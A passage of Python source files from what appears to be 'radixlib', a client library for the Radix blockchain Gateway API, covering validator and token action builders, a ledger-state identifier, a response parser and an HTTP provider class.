public_key = radix.derive.public_key_from_wallet_address(account_address),
network = self.network
)
else:
raise ValueError(
"At least one argument needs to be passed to this method to build the action."
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
RegisterValidator(_validator_address)
)
return self
@overload
def unregister_validator(self, *, validator_address: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, node_address: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, public_key: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, account_address: str) -> 'ActionBuilder': ...
def unregister_validator(
self,
*,
validator_address: Optional[str] = None,
node_address: Optional[str] = None,
public_key: Optional[str] = None,
account_address: Optional[str] = None,
) -> 'ActionBuilder':
""" Creates a new UnregisterValidator action.
This method is used to create a new UnregisterValidator action and has four overrides to
allow this method to be called using anything that identifies the validator.
Args:
validator_address (:obj:`str`, optional): A string of the validator address to unregister.
node_address (:obj:`str`, optional): A string of the node address to unregister.
public_key (:obj:`str`, optional): A string of the public key of the validator to
unregister.
account_address (:obj:`str`, optional): A string of the account address of the validator
to unregister.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Getting the validator address from the arguments passed
_validator_address: str = ""
if validator_address:
_validator_address = validator_address
elif node_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_node_or_validator_address(node_address),
network = self.network
)
elif public_key:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = public_key,
network = self.network
)
elif account_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_wallet_address(account_address),
network = self.network
)
else:
raise ValueError(
"At least one argument needs to be passed to this method to build the action."
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnregisterValidator(_validator_address)
)
return self
def to_action_list(self) -> List[ActionType]:
""" Gets a list of the actions that have been created by the action builder so far """
return self.__actions_list
```
#### File: radixlib/actions/mint_tokens.py
```python
from radixlib.api_types.identifiers import AccountIdentifier
from radixlib.serializable import Serializable
from radixlib.api_types import TokenAmount
from typing import Dict, Any
import radixlib as radix
import json
class MintTokens(Serializable):
""" Defines a MintTokens action """
def __init__(
self,
to_account: str,
amount: int,
token_rri: str,
) -> None:
""" Instantiates a new MintTokens action used for the creation of new tokens.
Args:
to_account (str): The account that the tokens will be minted for.
amount (int, optional): The amount of tokens to mint.
token_rri (str, optional): The RRI of the token.
"""
self.to_account: AccountIdentifier = AccountIdentifier(to_account)
self.amount: int = amount
self.token_rri: str = token_rri
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively({ # type: ignore
"type": "MintTokens",
"to_account": self.to_account,
"amount": TokenAmount(
rri = self.token_rri,
amount = self.amount
)
})
)
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[Any, Any]
) -> 'MintTokens':
""" Loads a MintTokens from a Gateway API response dictionary
Args:
dictionary (dict): The dictionary to load the object from
Returns:
MintTokens: A new MintTokens initalized from the dictionary
Raises:
TypeError: Raised when the type of the action in the dictionary does not match
the action name of the class
"""
if dictionary.get('type') != "MintTokens":
raise TypeError(f"Expected a dictionary with a type of MintTokens but got: {dictionary.get('type')}")
return cls(
to_account = dictionary['to_account']['address'],
amount = int(dictionary['amount']['value']),
token_rri = dictionary['amount']['token_identifier']['rri'],
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'MintTokens':
""" Loads a MintTokens from a Gateway API response JSON string. """
return cls.from_dict(json.loads(json_string))
```
#### File: radixlib/actions/unstake_tokens.py
```python
from radixlib.api_types.identifiers import AccountIdentifier, ValidatorIdentifier
from radixlib.serializable import Serializable
from radixlib.api_types import TokenAmount
from typing import Dict, Any, Optional, overload
import radixlib as radix
import json
class UnstakeTokens(Serializable):
""" Defines an UnstakeTokens action """
@overload
def __init__(
self,
*,
to_account: str,
from_validator: str,
unstake_percentage: float
) -> None : ...
@overload
def __init__(
self,
*,
to_account: str,
from_validator: str,
amount: int,
token_rri: str
) -> None: ...
def __init__(
self,
*,
to_account: str,
from_validator: str,
unstake_percentage: Optional[float] = None,
amount: Optional[int] = None,
token_rri: Optional[str] = None,
) -> None:
""" Instantiates a new UnstakeTokens action used for the creation of new tokens.
Args:
to_account (str): The account that is unstaking their tokens.
from_validator (str): The validator to unstake the tokens from.
amount (int, optional): The amount of tokens to send.
token_rri (str, optional): The RRI of XRD on that specific network.
unstake_percentage (float, optional): An optional argument of the percentage of tokens
to unstake from the validator.
Note:
When calling this constructor, you need to specify one of the following:
#. The amount and token rri together.
#. The unstake percentage alone.
One of the above two choices must be specified for a successful constructor call.
Raises:
ValueError: Raised in the following cases:
#. When the token RRI given is not of the native XRD token.
#. When the percentage amount given is not between 0 and 100.
"""
# Checking if all of the arguments are none.
if unstake_percentage is None and amount is None and token_rri is None: # None given
raise ValueError("All of the amount specifiers were set to none. I can't tell how much you want to unstake.")
elif unstake_percentage is not None and (amount is not None or token_rri is not None): # All or some given
raise ValueError("Conflict between the amount specifiers. You've specified the percentage to unstake and the amount to unstake. You can't specify both at the same time.")
elif (amount is not None and token_rri is None) or (token_rri is None and amount is not None):
raise ValueError("You did not specify a complete TokenAmount.")
# Checking which of the aguments to set
if unstake_percentage is not None:
self.unstake_percentage: float = unstake_percentage
if not (0 <= self.unstake_percentage <= 100):
raise ValueError("The unstake percentage must be a number between 0 and 100.")
elif amount is not None and token_rri is not None:
self.amount: int = amount
self.token_rri: str = token_rri
if not token_rri.lower().startswith('xrd'):
raise ValueError("RRI provided is not of the network's native XRD token.")
self.to_account: AccountIdentifier = AccountIdentifier(to_account)
self.from_validator: ValidatorIdentifier = ValidatorIdentifier(from_validator)
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively({
"type": "UnstakeTokens",
"to_account": self.to_account,
"from_validator": self.from_validator,
"amount": TokenAmount(
rri = self.token_rri,
amount = self.amount
) if getattr(self, 'amount', None) is not None else None,
"unstake_percentage": getattr(self, "unstake_percentage", None)
})
)
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[Any, Any]
) -> 'UnstakeTokens':
""" Loads a UnstakeTokens from a Gateway API response dictionary
Args:
dictionary (dict): The dictionary to load the object from
Returns:
UnstakeTokens: A new UnstakeTokens initalized from the dictionary
Raises:
TypeError: Raised when the type of the action in the dictionary does not match
the action name of the class
"""
if dictionary.get('type') != "UnstakeTokens":
raise TypeError(f"Expected a dictionary with a type of UnstakeTokens but got: {dictionary.get('type')}")
return cls(
to_account = dictionary['to_account']['address'],
from_validator = dictionary['from_validator']['address'],
amount = None if dictionary.get('amount') is None else int(dictionary['amount']['value']),
token_rri = None if dictionary.get('amount') is None else str(dictionary['amount']['token_identifier']['rri']),
unstake_percentage = dictionary.get('unstake_percentage')
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'UnstakeTokens':
""" Loads a UnstakeTokens from a Gateway API response JSON string. """
return cls.from_dict(json.loads(json_string))
```
#### File: api_types/identifiers/state_identifier.py
```python
from radixlib.serializable import Serializable
import radixlib.utils as utils
from typing import Dict, Optional, Set, Any, overload
from datetime import datetime
import dateparser
import json
import pytz
class StateIdentifier(Serializable):
""" The implementation of an StateIdentifier """
@overload
def __init__(self, *, version: int) -> None: ...
@overload
def __init__(self, *, timestamp: datetime) -> None: ...
@overload
def __init__(self, *, epoch: int) -> None: ...
@overload
def __init__(self, *, epoch: int, round: int) -> None: ...
def __init__(
self,
*,
version: Optional[int] = None,
timestamp: Optional[datetime] = None,
epoch: Optional[int] = None,
round: Optional[int] = None
) -> None:
""" Instantiates a new StateIdentifier from the state information
Args:
version (:obj:`int`, optional): An optional argument that defaults to None. If the
version is provided, the latest ledger state <= the given version is returned.
timestamp (:obj:`datetime`, optional): An optional argument that defaults to None. If a
timestamp is provided, the latest ledger state <= the given timestamp is returned.
epoch (:obj:`int`, optional): An optional argument that defaults to None. If an epoch is
provided, the ledger state at the given epoch <= the given round (else round 0) is
returned.
round (:obj:`int`, optional): An optional argument that defaults to None. If a round is
provided, the ledger state at the given round <= the given round.
Raises:
ValueError: Raised when invalid StateIdentifier arguments are given. StateIdentifiers
are only valid in the cases below::
#. All of the arguments are missing (creating no state identifier.)
#. Only the state version is defined.
#. Only the timestamp is defined.
#. Only the epoch is defined.
#. Only the epoch and round is defined.
"""
# Checking the state identifier to ensure that it is a valid state identifier.
# These checks are done due to: https://github.com/radixdlt/radixdlt-network-gateway/blob/c473fab883a53f8821842013336d0db5d2cb0258/src/GatewayAPI/Database/LedgerStateQuerier.cs#L251
none_set: Set[None] = set([None])
is_all_missing: bool = set([version, timestamp, epoch, round]) == none_set
only_state_version: bool = version is not None and set([timestamp, epoch, round]) == none_set
only_timestamp: bool = timestamp is not None and set([version, epoch, round]) == none_set
only_epoch_given: bool = epoch is not None and set([timestamp, version, round]) == none_set
epoch_and_round_given: bool = epoch is not None and round is not None and set([timestamp, version]) == none_set
if [is_all_missing, only_state_version, only_timestamp, only_epoch_given, epoch_and_round_given].count(True) != 1:
raise ValueError("The at_state_identifier was not either (A) missing (B) with only a state_version; (C) with only a Timestamp; (D) with only an Epoch; or (E) with only an Epoch and Round")
# Setting the arguments to the variables
self.version: Optional[int] = version
self.timestamp: Optional[datetime] = timestamp
self.epoch: Optional[int] = epoch
self.round: Optional[int] = round
def __str__(self) -> str:
""" Converts the object to a string """
return f"""StateIdentifier({", ".join(map(lambda x: "%s=%s" % x, self.to_dict().items()))})"""
def __repr__(self) -> str:
""" Represents an object """
return str(self)
def __eq__(self, other: 'object') -> bool:
""" Checks for equality between self and other """
return self.to_dict() == other.to_dict() if isinstance(other, StateIdentifier) else False
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return utils.remove_none_values_recursively({
"version": self.version,
"timestamp": self.timestamp.astimezone(pytz.UTC).isoformat()[:23] + 'Z' if self.timestamp is not None else None,
"epoch": self.epoch,
"round": self.round,
})
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[str, Any]
) -> 'StateIdentifier':
""" Creates a new instance of the StateIdentifier from a dictionary
This method is used to load up an StateIdentifier from the dictionaries that are returned
by the Gateway API.
Args:
dictionary (dict): A dictionary of the StateIdentifier obtained from the Gateway API.
Returns:
StateIdentifier: An StateIdentifier loaded with the data
"""
return cls(
version = dictionary['version'],
timestamp = dateparser.parse(dictionary['timestamp']),
epoch = dictionary['epoch'],
round = dictionary['round'],
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'StateIdentifier':
""" Creates a new instance of the StateIdentifier from a string
This method is used to load up an StateIdentifier from the strings that are returned
by the Gateway API.
Args:
json_string (str): The JSON serialzable strings returnd by the gateway API.
Returns:
StateIdentifier: An StateIdentifier loaded with the data
"""
return cls.from_dict(json.loads(json_string))
```
#### File: radixlib/parsers/default_parser.py
```python
from typing import Callable, Optional, Dict, Any, List
from radixlib.parsers.base_parser import ParserBase
import radixlib as radix
import dateparser
class DefaultParser(ParserBase):
""" A default parser used to parse the responses of the gateway API into a format that is easy
to query
"""
@classmethod
def parse(
cls,
data: Any,
data_type: str
) -> Any:
""" Routes the parsing of the data to the appropriate parsing function from within the class
This function acts as a router which tires to find the appropriate parsing function within
the class to parse the data. If no parser is implemented for this data type, then the
original data is returned without any parsing.
Args:
data (Any): Data of any type to pass to the parser function
data_type (str): Type of the data or the origin of the data
Returns:
Any: The parsed data
"""
# Getting the parsing function for this data type from the attributes of the class
function_name: str = f'parse_{data_type}'
parsing_function: Optional[Callable[..., Any]] = getattr(cls, function_name, None)
# We try calling the parsing function with the data that we have. If the parsing function
# works, then we return the parsed data. However, if a TypeError or NotImplementedError is
# raised, then we return the original data
try:
parsed_data: Any = parsing_function(data) # type: ignore
return parsed_data if parsed_data is not None else data
except (TypeError, NotImplementedError):
return data
@classmethod
def parse_get_gateway_info(cls, data: Dict[str, Any]) -> Any:
""" A function used for the parsing of the get_gateway_info API calls.
This parser function produces output in the following format::
{
"network_identifier": {
"network": "mainnet"
},
"gateway_api": {
"version": "1.0.1",
"open_api_schema_version": "1.0.3"
},
"ledger_state": {
"version": 78345123,
"timestamp": "2022-02-03T15:24:35.866Z",
"epoch": 7024,
"round": 8910
},
"target_ledger_state": {
"version": 78345127
}
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
# No parsing is needed in this case, the default format the data is given in is easy to
# query.
raise NotImplementedError("No implementation for the parse_get_gateway_info")
@classmethod
def parse_derive_account_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the derive_account_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the derived account address.
"""
return data['account_identifier']['address']
@classmethod
def parse_get_account_balances(cls, data: Dict[Any, Any]) -> Dict[str, Dict[str, int]]:
""" A function used for the parsing of the get_account_balances API calls.
This parser function produces output in the following format::
{
"total_balance": {
"token_rri": "balance of token"
},
"staking_balance": {
"token_rri": "balance of token"
},
"liquid_balance": {
"token_rri": "balance of token"
}
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
# Processing the balances into an easy to query dictionary format
final_balances: Dict[str, Dict[str, int]] = {
"total_balance": {},
"staking_balance": {},
"liquid_balance": {},
}
final_balances['staking_balance'][data['account_balances']['staked_and_unstaking_balance']['token_identifier']['rri']] = int(data['account_balances']['staked_and_unstaking_balance']['value'])
for token_balance in data['account_balances']['liquid_balances']:
final_balances['liquid_balance'][token_balance['token_identifier']['rri']] = int(token_balance['value'])
unique_rris: List[str] = list(set(list(final_balances['staking_balance'].keys()) + list(final_balances['liquid_balance'].keys())))
for rri in unique_rris:
balance1: Optional[int] = final_balances['staking_balance'].get(rri)
balance2: Optional[int] = final_balances['liquid_balance'].get(rri)
final_balances['total_balance'][rri] = (0 if balance1 is None else balance1) + (0 if balance2 is None else balance2)
return final_balances
@classmethod
def parse_get_stake_positions(cls, data: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
""" A function used for the parsing of the get_stake_positions API calls.
This parser function produces output in the following format::
{
"pending_stakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
}
],
"stakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
}
]
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
key: list(map(lambda x: dict([
('validator_address', x['validator_identifier']['address']),
('amount', {
x['delegated_stake']['token_identifier']['rri']: int(x['delegated_stake']['value'])
})
]), value))
for key, value
in data.items()
if key in ['pending_stakes', 'stakes']
}
@classmethod
def parse_get_unstake_positions(cls, data: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
""" A function used for the parsing of the get_unstake_positions API calls.
This parser function produces output in the following format::
{
"pending_unstakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
"epochs_until_unlocked": "amount"
}
],
"unstakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
"epochs_until_unlocked": "amount"
}
]
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
key: list(map(lambda x: dict([
('validator_address', x['validator_identifier']['address']),
('amount', {
x['delegated_stake']['token_identifier']['rri']: int(x['delegated_stake']['value'])
}),
('epochs_until_unlocked', x['epochs_until_unlocked']),
]), value))
for key, value
in data.items()
if key in ['pending_unstakes', 'unstakes']
}
@classmethod
def parse_get_account_transactions(cls, data: Dict[str, Any]) -> List[Dict[str, Any]]:
""" A function used for the parsing of the get_account_transactions API calls.
This parser function produces output in the following format::
[
{
"hash": data['transaction']['transaction_identifier']['hash'],
"status": data['transaction']['transaction_status']['status'],
"confirmed_time": dateparser.parse(data['transaction']['transaction_status']['confirmed_time']),
"actions": list(map(
lambda x: getattr(radix.actions, x['type']).from_dict(x),
data['transaction']['actions']
)),
"fee_paid": {
data['transaction']['fee_paid']['token_identifier']['rri']: int(data['transaction']['fee_paid']['value'])
},
"transaction_blob": data['transaction']['metadata']['hex'],
"message_blob": data['transaction']['metadata'].get('message'),
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return list(map(
lambda x: cls.parse({'transaction': x}, 'transaction_status'),
data['transactions']
))
@classmethod
def parse_get_native_token_info(cls, data: Any) -> Any:
""" A function used for the parsing of the get_native_token_info API calls.
This parser function produces output in the following format::
{
"rri": "token_rri",
"total_supply": "amount"
"total_minted": "amount"
"total_burned": "amount"
"name": "token_name"
"description": "token_description",
"icon_url": "token_icon_url",
"url": "token_url",
"symbol": "token_symbol",
"is_supply_mutable": "token_is_supply_mutable",
"granularity": "token_granularity",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return cls.parse(data, 'get_token_info')
@classmethod
def parse_get_token_info(cls, data: Any) -> Any:
""" A function used for the parsing of the get_token_info API calls.
This parser function produces output in the following format::
{
"rri": "token_rri",
"total_supply": "amount"
"total_minted": "amount"
"total_burned": "amount"
"name": "token_name"
"description": "token_description",
"icon_url": "token_icon_url",
"url": "token_url",
"symbol": "token_symbol",
"is_supply_mutable": "token_is_supply_mutable",
"granularity": "token_granularity",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"rri": data['token']['token_identifier']['rri'],
"total_supply": int(data['token']['token_supply']['value']),
"total_minted": int(data['token']['info']['total_minted']['value']),
"total_burned": int(data['token']['info']['total_burned']['value']),
"name": data['token']['token_properties']['name'],
"description": data['token']['token_properties']['description'],
"icon_url": data['token']['token_properties']['icon_url'],
"url": data['token']['token_properties']['url'],
"symbol": data['token']['token_properties']['symbol'],
"is_supply_mutable": bool(data['token']['token_properties']['is_supply_mutable']),
"granularity": int(data['token']['token_properties']['granularity']),
}
@classmethod
def parse_derive_token_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the derive_token_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the token RRI
"""
return data['token_identifier']['rri']
@classmethod
def parse_get_validator(cls, data: Dict[str, Any]) -> Dict[str, Any]:
""" A function used for the parsing of the get_validator API calls.
This parser function produces output in the following format::
{
"validator_address": "address",
"stake": {
"xrd_rri": "amount"
},
"owner_stake": {
"xrd_rri": "amount"
},
"uptime": {
"epoch_range": {
"from": "from_epoch",
"to": "to_epoch"
},
"uptime_percentage": "uptime_percentage",
"proposals_missed": "proposals_missed",
"proposals_completed": "proposals_completed"
},
"url": "url",
"validator_fee_percentage": "validator_fee_percentage",
"name": "name",
"registered": "registered",
"owner_account_address": "owner_account_address",
"external_stake_accepted": "external_stake_accepted",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"validator_address": data['validator']['validator_identifier']['address'],
"stake": {
data['validator']['stake']['token_identifier']['rri']: int(data['validator']['stake']['value'])
},
"owner_stake": {
data['validator']['info']['owner_stake']['token_identifier']['rri']: int(data['validator']['info']['owner_stake']['value'])
},
"uptime": data['validator']['info']['uptime'],
"url": data['validator']['properties']['url'],
"validator_fee_percentage": data['validator']['properties']['validator_fee_percentage'],
"name": data['validator']['properties']['name'],
"registered": bool(data['validator']['properties']['registered']),
"owner_account_address": data['validator']['properties']['owner_account_identifier']['address'],
"external_stake_accepted": data['validator']['properties']['external_stake_accepted'],
}
@classmethod
def parse_get_validator_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the get_validator_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the validator address
"""
return data['validator_identifier']['address']
@classmethod
def parse_get_validators(cls, data: Dict[str, Any]) -> List[Dict[str, Any]]:
""" A function used for the parsing of the get_validators API calls.
This parser function produces output in the following format::
[
{
"validator_address": "address",
"stake": {
"xrd_rri": "amount"
},
"owner_stake": {
"xrd_rri": "amount"
},
"uptime": {
"epoch_range": {
"from": "from_epoch",
"to": "to_epoch"
},
"uptime_percentage": "uptime_percentage",
"proposals_missed": "proposals_missed",
"proposals_completed": "proposals_completed"
},
"url": "url",
"validator_fee_percentage": "validator_fee_percentage",
"name": "name",
"registered": "registered",
"owner_account_address": "owner_account_address",
"external_stake_accepted": "external_stake_accepted",
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return list(map(
lambda x: cls.parse({'validator': x}, 'get_validator'),
data['validators']
))
@classmethod
def parse_get_validator_stakes(cls, data: Any) -> Any:
""" A function used for the parsing of the get_validator_stakes API calls.
This parser function produces output in the following format::
[
{
"validator_address": "address",
"account_address": "address",
"total_pending_stake": {
"xrd_rri": "amount"
},
"total_stake": {
"xrd_rri": "amount"
},
"total_pending_unstake": {
"xrd_rri": "amount"
},
"total_unstaking": {
"xrd_rri": "amount"
},
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return [{
"validator_address": info['validator']['address'],
"account_address": info['account']['address'],
"total_pending_stake": {
info['total_pending_stake']['token_identifier']['rri']: int(info['total_pending_stake']['value'])
},
"total_stake": {
info['total_stake']['token_identifier']['rri']: int(info['total_stake']['value'])
},
"total_pending_unstake": {
info['total_pending_unstake']['token_identifier']['rri']: int(info['total_pending_unstake']['value'])
},
"total_unstaking": {
info['total_unstaking']['token_identifier']['rri']: int(info['total_unstaking']['value'])
},
}
for info
in data['account_stake_delegations']
]
@classmethod
def parse_get_transaction_rules(cls, data: Any) -> Any:
""" A function used for the parsing of the get_transaction_rules API calls.
This parser function produces output in the following format::
{
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
@classmethod
def parse_build_transaction(cls, data: Dict[str, Any]) -> Dict[str, Any]:
""" A function used for the parsing of the build_transaction API calls.
This parser function produces output in the following format::
{
"fee": {
"xrd_rri": "amount"
},
"unsigned_transaction": "transaction_blob",
"payload_to_sign": "payload_blob"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"fee": {
data['transaction_build']['fee']['token_identifier']['rri']: int(data['transaction_build']['fee']['value'])
},
"unsigned_transaction": data['transaction_build']['unsigned_transaction'],
"payload_to_sign": data['transaction_build']['payload_to_sign'],
}
@classmethod
def parse_finalize_transaction(cls, data: Dict[str, Any]) -> Dict[str, str]:
""" A function used for the parsing of the finalize_transaction API calls.
This parser function produces output in the following format::
{
"signed_transaction": "transaction_blob",
"transaction_hash": "hash"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"signed_transaction": data['signed_transaction'],
"transaction_hash": data['transaction_identifier']['hash']
}
@classmethod
def parse_submit_transaction(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the submit_transaction API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the transaction hash
"""
return data['transaction_identifier']['hash']
@classmethod
def parse_transaction_status(cls, data: Any) -> Any:
""" A function used for the parsing of the transaction_status API calls.
This parser function produces output in the following format::
{
"hash": "tx_hash",
"status": "tx_status",
"confirmed_time": "datetime",
"actions": [],
"fee_paid": {
"xrd_rri": "amount"
},
"transaction_blob": "blob",
"message_blob": "blob"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"hash": data['transaction']['transaction_identifier']['hash'],
"status": data['transaction']['transaction_status']['status'],
"confirmed_time": dateparser.parse(data['transaction']['transaction_status']['confirmed_time']),
"actions": list(map(
lambda x: getattr(radix.actions, x['type']).from_dict(x),
data['transaction']['actions']
)),
"fee_paid": {
data['transaction']['fee_paid']['token_identifier']['rri']: int(data['transaction']['fee_paid']['value'])
},
"transaction_blob": data['transaction']['metadata']['hex'],
"message_blob": data['transaction']['metadata'].get('message'),
}
```
#### File: src/radixlib/provider.py
```python
from radixlib.api_types.identifiers import (
TransactionIdentifier,
ValidatorIdentifier,
NetworkIdentifier,
AccountIdentifier,
TokenIdentifier,
StateIdentifier,
)
from radixlib.actions import ActionType
from radixlib.network import Network
import radixlib as radix
import requests
from typing import Optional, Any, Dict, Union, List
class Provider():
""" An implementation of a provider for the Gateway API of the Radix blockchain.
This provider is implemented in a way that makes it easy to make requests to the API. However,
it is not the job of the provider to parse the responses from the API. The provider only goes
as far as trying to load in the response as json if its possible, but that is about it. This is
because the provider's job is to provide an easy way to communicate with the gateway API, not to
parse responses.
"""
def __init__(
self,
network: Network,
custom_gateway_url: Optional[str] = None,
open_api_version: str = "1.1.2",
) -> None:
""" Instantiates a new provider object through the passed parameters for the given network.
This method is used to create a new provider object for the given network object passed in
the arguments. The provider supports default RPC urls for both the mainnet and the stokenet.
Aside from that, if you wish to connect to some other network, the :obj:`custom_gateway_url`
becomes nolonger an optional argument.
Args:
network (Network): The type of network that the provider will connect to.
custom_gateway_url (:obj:`str`, optional): An optional argument that defaults to None.
This is the url of the RPC to connect to if we wish to connect to a custom gateway.
open_api_version (str): An optional argument that defaults to "1.1.2" and it defines the
value for the X-Radixdlt-Target-Gw-Api header which is requested by the gateway API.
Raises:
ValueError: Raised when a network other than the mainnet or the stokenet is used without
providing a custom_gateway_url.
"""
# Checking to see if the network provides a default gateway URL or not
if network.default_gateway_url or custom_gateway_url:
self.base_url: str = custom_gateway_url or network.default_gateway_url # type: ignore
self.network: Network = network
self.open_api_version: str = open_api_version
else:
raise ValueError(
"The network provided does not have a default gateway API URL and no URL was "
"supplied to the custom_gateway_url"
)
def __str__(self) -> str:
""" Represents the provider as a string """
return f"Provider(base_url={self.base_url}, network={self.network.name}, open_api_version={self.open_api_version})"
def __repr__(self) -> str:
""" Represents the provider """
return str(self)
def __dispatch(
self,
endpoint: str,
params: Dict[Any, Any],
http_method: str = "POST"
) -> Dict[Any, Any]:
""" Dispatches HTTP calls to the endpoints with the params provided
Args:
endpoint (str): The endpoint to make the HTTP call to.
params (dict): The JSON payload to include in the request body.
http_method (str): The type of request to make, defaults to a POST request.
Returns:
dict: A dictionary of the response from the API.
Raises:
TypeError: Raised if the response from the API is not a JSON response.
"""
# The network identifier is always in the JSON body of all requests made to the dateway API.
# So, we add the network identifier to the request parameters
params['network_identifier'] = NetworkIdentifier(self.network)
# Making the request to the gateway API
response: requests.Response = requests.request(
method = str(http_method),
url = f'{self.base_url}/{endpoint}',
json = radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively(
iterable = params # type: ignore
)
),
headers = {
"X-Radixdlt-Target-Gw-Api": self.open_api_version
}
)
# Checking the type of the content sent back from the API. If the content is in JSON then
# we are good. If not then we throw an exception.
if "application/json" not in str(response.headers.get('content-type')):
raise TypeError(
f"The provider expects a JSON response but got a response of the type: "
f"{str(response.headers.get('content-type'))}. Response: {response.text}"
)
# Converting the response body to JSON and checking if there are errors in the response
json_response: Dict[Any, Any] = response.json()
return json_response
# #######################################
# ---------- Gateway Endpoints ----------
# #######################################
def get_gateway_info(self) -> Dict[str, Any]:
""" Returns the Gateway API version, network and current ledger state. """
return self.__dispatch(
endpoint = "gateway",
params = {}
)
# #######################################
# ---------- Account Endpoints ----------
# #######################################
def derive_account_identifier(
self,
public_key: str
) -> Dict[str, Any]:
""" Derives the wallet address for the given public key.
This method is similar to the `derive.wallet_address_from_public_key` method with the only
exception being that in this case we're asking the node to derive the accoutn identifier
(wallet address) for us. This might be useful if a change suddenly happens to the network
and all of the HRPs are changed or any case where computing the wallet address locally does
not make sense.
Args:
public_key (str): The public key to derive the wallet address for.
Returns:
Dict[str, Any]: A dictionary of the account identifier.
"""
return self.__dispatch(
endpoint = "account/derive",
params = {
"public_key": {
"hex": public_key
}
}
)
def get_account_balances(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns an account's available and staked token balances, given an account address.
Args:
account_identifier (account_address): The account to get the balances for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account balances
"""
return self.__dispatch(
endpoint = "account/balances",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_stake_positions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the xrd which the account has in pending and active delegated stake positions
with validators, given an account address.
Args:
account_address (str): The account to get the stakes for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account stake positions.
"""
return self.__dispatch(
endpoint = "account/stakes",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_unstake_positions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the xrd which the account has in pending and temporarily-locked delegated
unstake positions with validators, given an account address.
Args:
account_address (str): The account to get the unstakes for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account unstake positions.
"""
return self.__dispatch(
endpoint = "account/unstakes",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_account_transactions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None,
cursor: Optional[str] = None,
limit: int = 30,
) -> Dict[str, Any]:
""" Returns user-initiated transactions involving the given account address which have been
